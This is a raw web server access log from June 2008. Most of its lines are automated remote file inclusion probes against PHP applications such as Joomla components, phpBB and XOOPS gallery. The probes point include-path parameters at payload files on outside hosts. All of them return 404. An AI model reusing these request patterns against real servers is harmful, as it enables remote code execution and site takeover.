213.146.230.100 - - [22/Jun/2008:19:44:45 -0700] "GET /logs//cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:44:45 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
213.146.230.100 - - [22/Jun/2008:19:44:45 -0700] "GET //cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:45:20 -0700] "GET /logs/access_071217.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:45:21 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:45:21 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:19:45:33 -0700] "GET /logs/all%22.php?sourcedir=%22http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:19:45:33 -0700] "GET /all%22.php?sourcedir=%22http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:45:37 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:46:51 -0700] "GET /logs/access_071112.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:19:47:06 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:19:47:06 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:19:47:08 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:19:47:09 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:48:08 -0700] "GET /logs/access_071112.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:52:38 -0700] "GET /logs/access.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:52:39 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:19:52:39 -0700] "GET /logs/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.7.108.203 - - [22/Jun/2008:19:54:01 -0700] "GET /logs/access_071105.log//mvcw.php?step=1&vwar_root=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.7.108.203 - - [22/Jun/2008:19:54:01 -0700] "GET //mvcw.php?step=1&vwar_root=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.7.108.203 - - [22/Jun/2008:19:54:01 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.248.169.14 - - [22/Jun/2008:19:54:35 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:19:56:10 -0700] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:19:56:12 -0700] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:19:56:14 -0700] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:19:56:16 -0700] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.13.231.31 - - [22/Jun/2008:20:05:08 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.13.231.31 - - [22/Jun/2008:20:05:08 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.13.231.31 - - [22/Jun/2008:20:05:08 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.6.18.247 - - [22/Jun/2008:20:06:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
67.195.58.181 - - [22/Jun/2008:20:06:51 -0700] "GET /logs/access_071119.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:20:09:34 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:20:09:40 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:20:09:45 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:20:09:50 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:20:09:56 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:20:10:01 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:20:11:12 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:20:11:30 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:20:11:42 -0700] "GET /logs/access_080211.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:20:11:43 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
87.230.19.114 - - [22/Jun/2008:20:11:43 -0700] "GET /logs/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
222.124.143.236 - - [22/Jun/2008:20:15:07 -0700] "GET /logs/access.log//main.php?x=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
222.124.143.236 - - [22/Jun/2008:20:15:07 -0700] "GET //main.php?x=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
222.124.143.236 - - [22/Jun/2008:20:15:08 -0700] "GET /logs//main.php?x=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:20:17:37 -0700] "GET /logs/access_080211.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:20:17:37 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.55.179.18 - - [22/Jun/2008:20:17:37 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
74.208.46.46 - - [22/Jun/2008:20:18:21 -0700] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
74.208.46.46 - - [22/Jun/2008:20:18:21 -0700] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.117.129.77 - - [22/Jun/2008:20:18:37 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.117.129.77 - - [22/Jun/2008:20:18:38 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.117.129.77 - - [22/Jun/2008:20:18:43 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.208.46.46 - - [22/Jun/2008:20:19:26 -0700] "GET /logs/access_080414.log//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:20:20:05 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:20:20:05 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:20:20:05 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
12.158.188.13 - - [22/Jun/2008:20:20:05 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:20:21:46 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:20:21:46 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:20:21:46 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:20:21:46 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.208.46.46 - - [22/Jun/2008:20:22:07 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
206.53.51.240 - - [22/Jun/2008:20:24:10 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
206.53.51.240 - - [22/Jun/2008:20:24:10 -0700] "GET /include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
206.53.51.240 - - [22/Jun/2008:20:24:10 -0700] "GET /logs/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:25:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:25:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:26:41 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:26:41 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
85.234.133.173 - - [22/Jun/2008:20:26:58 -0700] "GET /logs/access.log/upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
85.234.133.173 - - [22/Jun/2008:20:26:58 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
85.234.133.173 - - [22/Jun/2008:20:26:59 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.117.129.77 - - [22/Jun/2008:20:27:42 -0700] "GET /logs/access_071105.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:20:28:15 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:20:28:15 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:28:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:28:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:29:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:29:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:33:38 -0700] "GET /adminbereich/designconfig.php?config[fsBase]=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:33:39 -0700] "GET /logs/adminbereich/designconfig.php?config[fsBase]=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:34:04 -0700] "GET /logs//geoip/DNS/RR.php?phpdns_basedir=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:34:04 -0700] "GET //geoip/DNS/RR.php?phpdns_basedir=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "neighborhoodglimpses.com"
64.72.122.182 - - [22/Jun/2008:20:34:04 -0700] "GET /logs/access_071105.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:35:21 -0700] "GET /logs/include/monitoring/engine/MakeXML.php?fileOreonConf=:http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
67.19.74.194 - - [22/Jun/2008:20:35:22 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=:http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
64.38.46.234 - - [22/Jun/2008:20:35:33 -0700] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=:http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "neighborhoodglimpses.com"
64.38.46.234 - - [22/Jun/2008:20:35:33 -0700] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=:http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
85.234.133.173 - - [22/Jun/2008:20:35:39 -0700] "GET /logs/access_071105.log/upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:35:55 -0700] "GET /logs/[Scripthttp://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:35:55 -0700] "GET /[Scripthttp://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:37:04 -0700] "GET /[Scripthttp://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:37:04 -0700] "GET /logs/[Scripthttp://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:38:43 -0700] "GET /logs//geoip/DNS/RR.php?phpdns_basedir=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:38:44 -0700] "GET //geoip/DNS/RR.php?phpdns_basedir=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:38:46 -0700] "GET /logs/adminbereich/designconfig.php?config[fsBase]=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
72.47.204.44 - - [22/Jun/2008:20:38:46 -0700] "GET /adminbereich/designconfig.php?config[fsBase]=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
74.6.18.221 - - [22/Jun/2008:20:40:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
67.195.58.161 - - [22/Jun/2008:20:40:12 -0700] "GET /logs/access.log HTTP/1.0" 200 73547 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
64.38.46.234 - - [22/Jun/2008:20:40:38 -0700] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=:http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.neighborhoodglimpses.com"
64.38.46.234 - - [22/Jun/2008:20:40:38 -0700] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=:http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:20:50:38 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.215.231.90 - - [22/Jun/2008:20:50:38 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
